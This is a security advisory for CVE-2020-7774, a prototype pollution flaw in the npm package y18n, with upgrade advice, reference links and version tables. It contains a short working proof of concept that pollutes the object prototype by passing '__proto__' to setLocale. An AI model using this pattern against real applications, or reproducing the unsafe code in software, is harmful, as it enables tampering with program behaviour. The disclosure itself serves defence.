[NPM:GHSA-C4W7-XM78-47VH] Prototype Pollution in y18n

Severity High

Affected Packages 3

Fixed Packages 3

CVEs 1

The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.

```js
const y18n = require('y18n')();

y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});

console.log(polluted); // true
```

Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.

ID

NPM:GHSA-C4W7-XM78-47VH

Severity

high

URL

https://github.com/advisories/GHSA-c4w7-xm78-47vh

Published

2021-03-29T16:05:12
(3 years ago)

Modified

2023-11-29T22:45:30
(9 months ago)

Rights

NPM Security Team

Other Advisories

Source	# ID	Name	URL
			https://nvd.nist.gov/vuln/detail/CVE-2020-7774
			https://github.com/yargs/y18n/issues/96
			https://github.com/yargs/y18n/pull/108
			https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
			https://snyk.io/vuln/SNYK-JS-Y18N-1021887
			https://github.com/yargs/y18n/commit/a9ac604abf756dec9687be3843e2c93bfe581f25
			https://www.oracle.com/security-alerts/cpuApr2021.html
			https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf
			https://github.com/yargs/y18n/commit/90401eea9062ad498f4f792e3fff8008c4c193a3
			https://github.com/advisories/GHSA-c4w7-xm78-47vh

Type	Package URL	Name / Product	Version
Affected	pkg:npm/y18n	y18n	>= 5.0.0 < 5.0.5
Fixed	pkg:npm/y18n	y18n	= 5.0.5
Affected	pkg:npm/y18n	y18n	= 4.0.0
Fixed	pkg:npm/y18n	y18n	= 4.0.1
Affected	pkg:npm/y18n	y18n	< 3.2.2
Fixed	pkg:npm/y18n	y18n	= 3.2.2

# CVE	Description	CVSS	EPSS	EPSS Trend (30 days)	Affected Products	Weaknesses	Security Advisories	Exploits	PoC	Pubblication Date	Modification Date
# CVE	Description	CVSS	EPSS	EPSS Trend (30 days)	Affected Products	Weaknesses	Security Advisories	PoC	Pubblication Date	Modification Date